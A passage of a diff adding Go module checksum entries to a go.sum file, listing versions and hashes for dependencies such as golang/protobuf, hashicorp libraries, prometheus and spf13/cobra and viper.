h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= +github.com/golang/mock v1.2.0/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A= +github.com/golang/mock v1.3.1/go.mod h1:sBzyDLLjw3U8JLTeZvSv8jJB+tU5PVekmnlKIyFUx0Y= +github.com/golang/mock v1.4.0/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw= +github.com/golang/mock v1.4.1/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw= +github.com/golang/mock v1.4.3/go.mod h1:UOMv5ysSaYNkG+OFQykRIcU/QvvxJf3p21QfJ2Bt3cw= +github.com/golang/mock v1.4.4/go.mod h1:l3mdAwkq5BuhzHwde/uurv3sEJeZMXNpwsxVWU71h+4= +github.com/golang/mock v1.5.0/go.mod h1:CWnOUgYIOo4TcNZ0wHX3YZCqsaM1I1Jvs6v3mP3KVu8= +github.com/golang/mock v1.6.0/go.mod h1:p6yTPP+5HYm5mzsMV8JkE6ZKdX+/wYM6Hr+LicevLPs= +github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U= +github.com/golang/protobuf v1.3.3/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= +github.com/golang/protobuf v1.3.4/go.mod h1:vzj43D7+SQXF/4pzW/hwtAqwc6iTitCiVSaWz5lYuqw= +github.com/golang/protobuf v1.3.5/go.mod h1:6O5/vntMXwX2lRkT1hjjk0nAC1IDOTvTlVgjlRvqsdk= +github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8= +github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA= +github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs= +github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w= +github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0= +github.com/golang/protobuf v1.4.1/go.mod h1:U8fpvMrcmy5pZrNK1lt4xCsGvpyWQ/VVv6QDs8UjoX8= +github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.4.3/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI= +github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk= +github.com/golang/protobuf v1.5.1/go.mod h1:DopwsBzvsk0Fs44TXzsVbJyPhcCPeIwnvohx4u74HPM= +github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY= +github.com/golang/snappy v0.0.3/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q= +github.com/google/btree v0.0.0-20180813153112-4030bb1f1f0c/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ= +github.com/google/btree v1.0.0/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ= +github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M= +github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU= +github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.4.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.1/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.2/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.4/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/go-cmp v0.5.6/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= +github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg= +github.com/google/martian v2.1.0+incompatible/go.mod h1:9I4somxYTbIHy5NJKHRl3wXiIaQGbYVAs8BPL6v8lEs= +github.com/google/martian/v3 v3.0.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0= +github.com/google/martian/v3 v3.1.0/go.mod h1:y5Zk1BBys9G+gd6Jrk0W3cC1+ELVxBWuIGO+w/tUAp0= +github.com/google/martian/v3 v3.2.1/go.mod h1:oBOf6HBosgwRXnUGWUB05QECsc6uvmMiJ3+6W4l/CUk= +github.com/google/pprof v0.0.0-20181206194817-3ea8567a2e57/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc= +github.com/google/pprof v0.0.0-20190515194954-54271f7e092f/go.mod h1:zfwlbNMJ+OItoe0UupaVj+oy1omPYYDuagoSzA8v9mc= +github.com/google/pprof v0.0.0-20191218002539-d4f498aebedc/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= +github.com/google/pprof v0.0.0-20200212024743-f11f1df84d12/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= +github.com/google/pprof v0.0.0-20200229191704-1ebb73c60ed3/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= +github.com/google/pprof v0.0.0-20200430221834-fc25d7d30c6d/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= +github.com/google/pprof v0.0.0-20200708004538-1a94d8640e99/go.mod h1:ZgVRPoUq/hfqzAqh7sHMqb3I9Rq5C59dIz2SbBwJ4eM= +github.com/google/pprof v0.0.0-20201023163331-3e6fc7fc9c4c/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20201203190320-1bf35d6f28c2/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20210122040257-d980be63207e/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20210226084205-cbba55b83ad5/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20210601050228-01bbb1931b22/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20210609004039-a478d1d731e9/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/pprof v0.0.0-20210720184732-4bb14d4b1be1/go.mod h1:kpwsk12EmLew5upagYY7GY0pfYCcupk39gWOCRROcvE= +github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI= +github.com/google/uuid v1.1.2/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo= +github.com/googleapis/gax-go/v2 v2.0.4/go.mod h1:0Wqv26UfaUD9n4G6kQubkQ+KchISgw+vpHVxEJEs9eg= +github.com/googleapis/gax-go/v2 v2.0.5/go.mod h1:DWXyrwAJ9X0FpwwEdw+IPEYBICEFu5mhpdKc/us6bOk= +github.com/googleapis/gax-go/v2 v2.1.0/go.mod h1:Q3nei7sK6ybPYH7twZdmQpAd1MKb7pfu6SK+H1/DsU0= +github.com/googleapis/gax-go/v2 v2.1.1/go.mod h1:hddJymUZASv3XPyGkUpKj8pPO47Rmb0eJc8R6ouapiM= +github.com/grpc-ecosystem/grpc-gateway v1.16.0/go.mod h1:BDjrQk3hbvj6Nolgz8mAMFbcEtjT1g+wF4CSlocrBnw= +github.com/hashicorp/consul/api v1.11.0/go.mod h1:XjsvQN+RJGWI2TWy1/kqaE16HrR2J/FWgkYjdZQsX9M= +github.com/hashicorp/consul/sdk v0.8.0/go.mod h1:GBvyrGALthsZObzUGsfgHZQDXjg4lOjagTIwIR1vPms= +github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4= +github.com/hashicorp/go-cleanhttp v0.5.0/go.mod h1:JpRdi6/HCYpAwUzNwuwqhbovhLtngrth3wmdIIUrZ80= +github.com/hashicorp/go-cleanhttp v0.5.1/go.mod h1:JpRdi6/HCYpAwUzNwuwqhbovhLtngrth3wmdIIUrZ80= +github.com/hashicorp/go-cleanhttp v0.5.2/go.mod h1:kO/YDlP8L1346E6Sodw+PrpBSV4/SoxCXGY6BqNFT48= +github.com/hashicorp/go-hclog v0.12.0/go.mod h1:whpDNt7SSdeAju8AWKIWsul05p54N/39EeqMAyrmvFQ= +github.com/hashicorp/go-hclog v1.0.0/go.mod h1:whpDNt7SSdeAju8AWKIWsul05p54N/39EeqMAyrmvFQ= +github.com/hashicorp/go-immutable-radix v1.0.0/go.mod h1:0y9vanUI8NX6FsYoO3zeMjhV/C5i9g4Q3DwcSNZ4P60= +github.com/hashicorp/go-immutable-radix v1.3.1/go.mod h1:0y9vanUI8NX6FsYoO3zeMjhV/C5i9g4Q3DwcSNZ4P60= +github.com/hashicorp/go-msgpack v0.5.3/go.mod h1:ahLV/dePpqEmjfWmKiqvPkv/twdG7iPBM1vqhUKIvfM= +github.com/hashicorp/go-multierror v1.0.0/go.mod h1:dHtQlpGsu+cZNNAkkCN/P3hoUDHhCYQXV3UM06sGGrk= +github.com/hashicorp/go-multierror v1.1.0/go.mod h1:spPvp8C1qA32ftKqdAHm4hHTbPw+vmowP0z+KUhOZdA= +github.com/hashicorp/go-retryablehttp v0.5.3/go.mod h1:9B5zBasrRhHXnJnui7y6sL7es7NDiJgTc6Er0maI1Xs= +github.com/hashicorp/go-rootcerts v1.0.2/go.mod h1:pqUvnprVnM5bf7AOirdbb01K4ccR319Vf4pU3K5EGc8= +github.com/hashicorp/go-sockaddr v1.0.0/go.mod h1:7Xibr9yA9JjQq1JpNB2Vw7kxv8xerXegt+ozgdvDeDU= +github.com/hashicorp/go-syslog v1.0.0/go.mod h1:qPfqrKkXGihmCqbJM2mZgkZGvKG1dFdvsLplgctolz4= +github.com/hashicorp/go-uuid v1.0.0/go.mod h1:6SBZvOh/SIDV7/2o3Jml5SYk/TvGqwFJ/bN7x4byOro= +github.com/hashicorp/go-uuid v1.0.1/go.mod h1:6SBZvOh/SIDV7/2o3Jml5SYk/TvGqwFJ/bN7x4byOro= +github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8= +github.com/hashicorp/golang-lru v0.5.1/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8= +github.com/hashicorp/golang-lru v0.5.4/go.mod h1:iADmTwqILo4mZ8BN3D2Q6+9jd8WM5uGBxy+E8yxSoD4= +github.com/hashicorp/hcl v1.0.0 h1:0Anlzjpi4vEasTeNFn2mLJgTSwt0+6sfsiTG8qcWGx4= +github.com/hashicorp/hcl v1.0.0/go.mod h1:E5yfLk+7swimpb2L/Alb/PJmXilQ/rhwaUYs4T20WEQ= +github.com/hashicorp/logutils v1.0.0/go.mod h1:QIAnNjmIWmVIIkWDTG1z5v++HQmx9WQRO+LraFDTW64= +github.com/hashicorp/mdns v1.0.1/go.mod h1:4gW7WsVCke5TE7EPeYliwHlRUyBtfCwuFwuMg2DmyNY= +github.com/hashicorp/mdns v1.0.4/go.mod h1:mtBihi+LeNXGtG8L9dX59gAEa12BDtBQSp4v/YAJqrc= +github.com/hashicorp/memberlist v0.2.2/go.mod h1:MS2lj3INKhZjWNqd3N0m3J+Jxf3DAOnAH9VT3Sh9MUE= +github.com/hashicorp/memberlist v0.3.0/go.mod h1:MS2lj3INKhZjWNqd3N0m3J+Jxf3DAOnAH9VT3Sh9MUE= +github.com/hashicorp/serf v0.9.5/go.mod h1:UWDWwZeL5cuWDJdl0C6wrvrUwEqtQ4ZKBKKENpqIUyk= +github.com/hashicorp/serf v0.9.6/go.mod h1:TXZNMjZQijwlDvp+r0b63xZ45H7JmCmgg4gpTwn9UV4= +github.com/iancoleman/strcase v0.2.0/go.mod h1:iwCmte+B7n89clKwxIoIXy/HfoL7AsD47ZCWhYzw7ho= +github.com/ianlancetaylor/demangle v0.0.0-20181102032728-5e5cf60278f6/go.mod h1:aSSvb/t6k1mPoxDqO4vJh6VOCGPwU4O0C2/Eqndh1Sc= +github.com/ianlancetaylor/demangle v0.0.0-20200824232613-28f6c0f3b639/go.mod h1:aSSvb/t6k1mPoxDqO4vJh6VOCGPwU4O0C2/Eqndh1Sc= +github.com/inconshreveable/mousetrap v1.0.0 h1:Z8tu5sraLXCXIcARxBp/8cbvlwVa7Z1NHg9XEKhtSvM= +github.com/inconshreveable/mousetrap v1.0.0/go.mod h1:PxqpIevigyE2G7u3NXJIT2ANytuPF1OarO4DADm73n8= +github.com/inconshreveable/mousetrap v1.1.0 h1:wN+x4NVGpMsO7ErUn/mUI3vEoE6Jt13X2s0bqwp9tc8= +github.com/inconshreveable/mousetrap v1.1.0/go.mod h1:vpF70FUmC8bwa3OWnCshd2FqLfsEA9PFc4w1p2J65bw= +github.com/json-iterator/go v1.1.6/go.mod h1:+SdeFBvtyEkXs7REEP0seUULqWtbJapLOCVDaaPEHmU= +github.com/json-iterator/go v1.1.9/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= +github.com/json-iterator/go v1.1.11/go.mod h1:KdQUCv79m/52Kvf8AW2vK1V8akMuk1QjK/uOdHXbAo4= +github.com/json-iterator/go v1.1.12/go.mod h1:e30LSqwooZae/UwlEbR2852Gd8hjQvJoHmT4TnhNGBo= +github.com/jstemmer/go-junit-report v0.0.0-20190106144839-af01ea7f8024/go.mod h1:6v2b51hI/fHJwM22ozAgKL4VKDeJcHhJFhtBdhmNjmU= +github.com/jstemmer/go-junit-report v0.9.1/go.mod h1:Brl9GWCQeLvo8nXZwPNNblvFj/XSXhF0NWZEnDohbsk= +github.com/judwhite/go-svc v1.2.1 h1:a7fsJzYUa33sfDJRF2N/WXhA+LonCEEY8BJb1tuS5tA= +github.com/judwhite/go-svc v1.2.1/go.mod h1:mo/P2JNX8C07ywpP9YtO2gnBgnUiFTHqtsZekJrUuTk= +github.com/julienschmidt/httprouter v1.2.0/go.mod h1:SYymIcj16QtmaHHD7aYtjjsJG7VTCxuUUipMqKk8s4w= +github.com/kisielk/errcheck v1.5.0/go.mod h1:pFxgyoBC7bSaBwPgfKdkLd5X25qrDl4LWUI2bnpBCr8= +github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= +github.com/konsorten/go-windows-terminal-sequences v1.0.1/go.mod h1:T0+1ngSBFLxvqU3pZ+m/2kptfBszLMUkC4ZK/EgS/cQ= +github.com/kr/fs v0.1.0/go.mod h1:FFnZGqtBN9Gxj7eW1uZ42v5BccTP0vu6NEaFoC2HwRg= +github.com/kr/logfmt v0.0.0-20140226030751-b84e30acd515/go.mod h1:+0opPa2QZZtGFBFZlji/RkVcI2GknAs/DXo4wKdlNEc= +github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= +github.com/kr/pretty v0.2.0 h1:s5hAObm+yFO5uHYt5dYjxi2rXrsnmRpJx4OYvIWUaQs= +github.com/kr/pretty v0.2.0/go.mod h1:ipq/a2n7PKx3OHsz4KJII5eveXtPO4qwEXGdVfWzfnI= +github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= +github.com/kr/text v0.1.0 h1:45sCR5RtlFHMR4UwH9sdQ5TC8v0qDQCHnXt+kaKSTVE= +github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= +github.com/lyft/protoc-gen-star v0.5.3/go.mod h1:V0xaHgaf5oCCqmcxYcWiDfTiKsZsRc87/1qhoTACD8w= +github.com/magiconair/properties v1.8.5 h1:b6kJs+EmPFMYGkow9GiUyCyOvIwYetYJ3fSaWak/Gls= +github.com/magiconair/properties v1.8.5/go.mod h1:y3VJvCyxH9uVvJTWEGAELF3aiYNyPKd5NZ3oSwXrF60= +github.com/manifoldco/promptui v0.9.0 h1:3V4HzJk1TtXW1MTZMP7mdlwbBpIinw3HztaIlYthEiA= +github.com/manifoldco/promptui v0.9.0/go.mod h1:ka04sppxSGFAtxX0qhlYQjISsg9mR4GWtQEhdbn6Pgg= +github.com/mattn/go-colorable v0.0.9/go.mod h1:9vuHe8Xs5qXnSaW/c/ABM9alt+Vo+STaOChaDxuIBZU= +github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= +github.com/mattn/go-colorable v0.1.6/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= +github.com/mattn/go-colorable v0.1.9/go.mod h1:u6P/XSegPjTcexA+o6vUJrdnUu04hMope9wVRipJSqc= +github.com/mattn/go-colorable v0.1.12/go.mod h1:u5H1YNBxpqRaxsYJYSkiCWKzEfiAb1Gb520KVy5xxl4= +github.com/mattn/go-isatty v0.0.3/go.mod h1:M+lRXTBqGeGNdLjl/ufCoiOlB5xdOkqRJdNxMWT7Zi4= +github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= +github.com/mattn/go-isatty v0.0.10/go.mod h1:qgIWMr58cqv1PHHyhnkY9lrL7etaEgOFcMEpPG5Rm84= +github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE= +github.com/mattn/go-isatty v0.0.12/go.mod h1:cbi8OIDigv2wuxKPP5vlRcQ1OAZbq2CE4Kysco4FUpU= +github.com/mattn/go-isatty v0.0.14/go.mod h1:7GGIvUiUoEMVVmxf/4nioHXj79iQHKdU27kJ6hsGG94= +github.com/matttproud/golang_protobuf_extensions v1.0.1/go.mod h1:D8He9yQNgCq6Z5Ld7szi9bcBfOoFv/3dc6xSMkL2PC0= +github.com/miekg/dns v1.0.14/go.mod h1:W1PPwlIAgtquWBMBEV9nkV9Cazfe8ScdGz/Lj7v3Nrg= +github.com/miekg/dns v1.1.26/go.mod h1:bPDLeHnStXmXAq1m/Ch/hvfNHr14JKNPMBo3VZKjuso= +github.com/miekg/dns v1.1.41/go.mod h1:p6aan82bvRIyn+zDIv9xYNUpwa73JcSh9BKwknJysuI= +github.com/mitchellh/cli v1.1.0/go.mod h1:xcISNoH86gajksDmfB23e/pu+B+GeFRMYmoHXxx3xhI= +github.com/mitchellh/go-homedir v1.1.0/go.mod h1:SfyaCUpYCn1Vlf4IUYiD9fPX4A5wJrkLzIz1N1q0pr0= +github.com/mitchellh/go-testing-interface v1.0.0/go.mod h1:kRemZodwjscx+RGhAo8eIhFbs2+BFgRtFPeD/KE+zxI= +github.com/mitchellh/mapstructure v0.0.0-20160808181253-ca63d7c062ee/go.mod h1:FVVH3fgwuzCH5S8UJGiWEs2h04kUh9fWfEaFds41c1Y= +github.com/mitchellh/mapstructure v1.1.2/go.mod h1:FVVH3fgwuzCH5S8UJGiWEs2h04kUh9fWfEaFds41c1Y= +github.com/mitchellh/mapstructure v1.4.3 h1:OVowDSCllw/YjdLkam3/sm7wEtOy59d8ndGgCcyj8cs= +github.com/mitchellh/mapstructure v1.4.3/go.mod h1:bFUtVrKA4DC2yAKiSyO/QUcy7e+RRV2QTWOzhPopBRo= +github.com/modern-go/concurrent v0.0.0-20180228061459-e0a39a4cb421/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= +github.com/modern-go/concurrent v0.0.0-20180306012644-bacd9c7ef1dd/go.mod h1:6dJC0mAP4ikYIbvyc7fijjWJddQyLn8Ig3JB5CqoB9Q= +github.com/modern-go/reflect2 v0.0.0-20180701023420-4b7aa43c6742/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0= +github.com/modern-go/reflect2 v1.0.1/go.mod h1:bx2lNnkwVCuqBIxFjflWJWanXIb3RllmbCylyMrvgv0= +github.com/modern-go/reflect2 v1.0.2/go.mod h1:yWuevngMOJpCy52FWWMvUC8ws7m/LJsjYzDa0/r8luk= +github.com/mwitkow/go-conntrack v0.0.0-20161129095857-cc309e4a2223/go.mod h1:qRWi+5nqEBWmkhHvq77mSJWrCKwh8bxhgT7d/eI7P4U= +github.com/pascaldekloe/goe v0.0.0-20180627143212-57f6aae5913c/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc= +github.com/pascaldekloe/goe v0.1.0/go.mod h1:lzWF7FIEvWOWxwDKqyGYQf6ZUaNfKdP144TG7ZOy1lc= +github.com/pelletier/go-toml v1.9.4 h1:tjENF6MfZAg8e4ZmZTeWaWiT2vXtsoO6+iuOjFhECwM= +github.com/pelletier/go-toml v1.9.4/go.mod h1:u1nR/EPcESfeI/szUZKdtJ0xRNbUoANCkoOuaOx1Y+c= +github.com/pkg/errors v0.8.0/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= +github.com/pkg/errors v0.8.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= +github.com/pkg/errors v0.9.1/go.mod h1:bwawxfHBFNV+L2hUp1rHADufV3IMtnDRdf1r5NINEl0= +github.com/pkg/sftp v1.10.1/go.mod h1:lYOWFsE0bwd1+KfKJaKeuokY15vzFx25BLbzYYoAxZI= +github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= +github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= +github.com/posener/complete v1.1.1/go.mod h1:em0nMJCgc9GFtwrmVmEMR/ZL6WyhyjMBndrE9hABlRI= +github.com/posener/complete v1.2.3/go.mod h1:WZIdtGGp+qx0sLrYKtIRAruyNpv6hFCicSgv7Sy7s/s= +github.com/prometheus/client_golang v0.9.1/go.mod h1:7SWBe2y4D6OKWSNQJUaRYU/AaXPKyh/dDVn+NZz0KFw= +github.com/prometheus/client_golang v1.0.0/go.mod h1:db9x61etRT2tGnBNRi70OPL5FsnadC4Ky3P0J6CfImo= +github.com/prometheus/client_golang v1.4.0/go.mod h1:e9GMxYsXl05ICDXkRhurwBS4Q3OK1iX/F2sw+iXX5zU= +github.com/prometheus/client_model v0.0.0-20180712105110-5c3871d89910/go.mod h1:MbSGuTsp3dbXC40dX6PRTWyKYBIrTGTE9sqQNg2J8bo= +github.com/prometheus/client_model v0.0.0-20190129233127-fd36f4220a90/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= +github.com/prometheus/client_model v0.0.0-20190812154241-14fe0d1b01d4/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= +github.com/prometheus/client_model v0.2.0/go.mod h1:xMI15A0UPsDsEKsMN9yxemIoYk6Tm2C1GtYGdfGttqA= +github.com/prometheus/common v0.4.1/go.mod h1:TNfzLD0ON7rHzMJeJkieUDPYmFC7Snx/y86RQel1bk4= +github.com/prometheus/common v0.9.1/go.mod h1:yhUN8i9wzaXS3w1O07YhxHEBxD+W35wd8bs7vj7HSQ4= +github.com/prometheus/procfs v0.0.0-20181005140218-185b4288413d/go.mod h1:c3At6R/oaqEKCNdg8wHV1ftS6bRYblBhIjjI8uT2IGk= +github.com/prometheus/procfs v0.0.2/go.mod h1:TjEm7ze935MbeOT/UhFTIMYKhuLP4wbCsTZCD3I8kEA= +github.com/prometheus/procfs v0.0.8/go.mod h1:7Qr8sr6344vo1JqZ6HhLceV9o3AJ1Ff+GxbHq6oeK9A= +github.com/rogpeppe/fastuuid v1.2.0/go.mod h1:jVj6XXZzXRy/MSR5jhDC/2q6DgLz+nrA6LYCDYWNEvQ= +github.com/rogpeppe/go-internal v1.3.0/go.mod h1:M8bDsm7K2OlrFYOpmOWEs/qY81heoFRclV5y23lUDJ4= +github.com/rs/xid v1.3.0/go.mod h1:trrq9SKmegXys3aeAKXMUTdJsYXVwGY3RLcfgqegfbg= +github.com/rs/zerolog v1.26.0 h1:ORM4ibhEZeTeQlCojCK2kPz1ogAY4bGs4tD+SaAdGaE= +github.com/rs/zerolog v1.26.0/go.mod h1:yBiM87lvSqX8h0Ww4sdzNSkVYZ8dL2xjZJG1lAuGZEo= +github.com/russross/blackfriday/v2 v2.1.0/go.mod h1:+Rmxgy9KzJVeS9/2gXHxylqXiyQDYRxCVz55jmeOWTM= +github.com/ryanuber/columnize v0.0.0-20160712163229-9b3edd62028f/go.mod h1:sm1tb6uqfes/u+d4ooFouqFdy9/2g9QGwK3SQygK0Ts= +github.com/sagikazarmark/crypt v0.3.0/go.mod h1:uD/D+6UF4SrIR1uGEv7bBNkNqLGqUr43MRiaGWX1Nig= +github.com/sean-/seed v0.0.0-20170313163322-e2103e2c3529/go.mod h1:DxrIzT+xaE7yg65j358z/aeFdxmN0P9QXhEzd20vsDc= +github.com/sirupsen/logrus v1.2.0/go.mod h1:LxeOpSwHxABJmUn/MG1IvRgCAasNZTLOkJPxbbu5VWo= +github.com/sirupsen/logrus v1.4.2/go.mod h1:tLMulIdttU9McNUspp0xgXVQah82FyeX6MwdIuYE2rE= +github.com/spaolacci/murmur3 v0.0.0-20180118202830-f09979ecbc72/go.mod h1:JwIasOWyU6f++ZhiEuf87xNszmSA2myDM2Kzu9HwQUA= +github.com/spf13/afero v1.3.3/go.mod h1:5KUK8ByomD5Ti5Artl0RtHeI5pTF7MIDuXL3yY520V4= +github.com/spf13/afero v1.6.0 h1:xoax2sJ2DT8S8xA2paPFjDCScCNeWsg75VG0DLRreiY= +github.com/spf13/afero v1.6.0/go.mod h1:Ai8FlHk4v/PARR026UzYexafAt9roJ7LcLMAmO6Z93I= +github.com/spf13/cast v1.4.1 h1:s0hze+J0196ZfEMTs80N7UlFt0BDuQ7Q+JDnHiMWKdA= +github.com/spf13/cast v1.4.1/go.mod h1:Qx5cxh0v+4UWYiBimWS+eyWzqEqokIECu5etghLkUJE= +github.com/spf13/cobra v1.3.0 h1:R7cSvGu+Vv+qX0gW5R/85dx2kmmJT5z5NM8ifdYjdn0= +github.com/spf13/cobra v1.3.0/go.mod h1:BrRVncBjOJa/eUcVVm9CE+oC6as8k+VYr4NY7WCi9V4= +github.com/spf13/cobra v1.8.1 h1:e5/vxKd/rZsfSJMUX1agtjeTDf+qv1/JdBF8gg5k9ZM= +github.com/spf13/cobra v1.8.1/go.mod h1:wHxEcudfqmLYa8iTfL+OuZPbBZkmvliBWKIezN3kD9Y= +github.com/spf13/jwalterweatherman v1.1.0 h1:ue6voC5bR5F8YxI5S67j9i582FU4Qvo2bmqnqMYADFk= +github.com/spf13/jwalterweatherman v1.1.0/go.mod h1:aNWZUN0dPAAO/Ljvb5BEdw96iTZ0EXowPYD95IqWIGo= +github.com/spf13/pflag v1.0.5 h1:iy+VFUOCP1a+8yFto/drg2CJ5u0yRoB7fZw3DKv/JXA= +github.com/spf13/pflag v1.0.5/go.mod h1:McXfInJRrz4CZXVZOBLb0bTZqETkiAhM9Iw0y3An2Bg= +github.com/spf13/viper v1.10.0/go.mod h1:SoyBPwAtKDzypXNDFKN5kzH7ppppbGZtls1UpIy5AsM= +github.com/spf13/viper v1.10.1 h1:nuJZuYpG7gTj/XqiUwg8bA0cp1+M2mC3J4g5luUYBKk= +github.com/spf13/viper v1.10.1/go.mod 